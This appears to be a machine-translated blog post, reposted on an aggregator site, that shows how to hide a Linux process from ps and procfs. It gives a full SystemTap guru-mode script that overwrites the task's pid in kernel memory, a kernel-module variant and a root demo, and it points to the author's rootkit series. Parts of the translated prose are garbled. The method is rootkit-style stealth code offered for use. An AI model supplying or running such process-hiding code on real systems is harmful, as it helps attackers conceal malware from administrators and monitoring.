One line of code hides Linux process

Others 2021-01-12 14:41:59 views: null

Some friends always ask how to hide Linux processes. I said to what extent do you want to hide it from the kernel or the user.

The whole discussion on the Internet is nothing more than hooking procfs or similar user-mode solutions, and it is inevitable to lengthen the discussion. I said, these scenes are too big and too complicated. For those who want to see the effect immediately, seeing such a bunch of complicated things is likely to be discouraged.

This article introduces an unconventional method of hiding Linux processes from users, with just one line of code:

  • Just modify the pid of the process.

Note that it is Xiaoyin, so it's not worth countering, so I can make a prank by the senior conference engineer.

target->pid = 0x7fffffff;

The complete script is as follows:

#!/usr/bin/stap -g
# hide.stp

global pid;

function hide(who:long)
%{
    
    
	struct task_struct *target;

	target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
	target->pid = 0x7fffffff;
%}

probe begin
{
    
    
	pid = $1
	hide(pid);
	exit();
}

Come on, try it out:

[root@localhost system]# ./tohide &
[1] 403
[root@localhost system]# ./hide.stp
[root@localhost system]#

Use the following command to detect all binary files that can display the process:

for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do 
	ls -l /proc/$pid/exe; 
done

The procfs is gone, and ps certainly cannot be detected.

If you think the stap of guru mode is weird, then you can write your own independent Linux kernel module and use the method of returning after modification:

target->pid = xxxx;
return -1;

Is not simply more than a variety of hook method, the so-called dynamic data codes do not move!

Simply talk about the principle.

  • When a task is created, the procfs directory structure is registered according to its pid.
  • When displaying the procfs directory structure, traverse the task list and use its pid as the key to find the procfs directory structure.
  • 0x7fffffff (or any other reasonable value) has not been registered at all, and of course it cannot be displayed.

Not much to say.

Again, don’t try to counter the methods described in this article, because something so simple is not worth countering at all, haha, is it?

You can refer to my previous Rootkit series of articles to continue to study how Linux processes hide in the kernel. At the same time, I have given countermeasures for each method.

There are not many people who play chess with myself, I want to try.

The leather shoes in Wenzhou, Zhejiang are wet, so they won’t get fat in the rain.

Guess you like

Origin blog.csdn.net/dog250/article/details/108032383
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com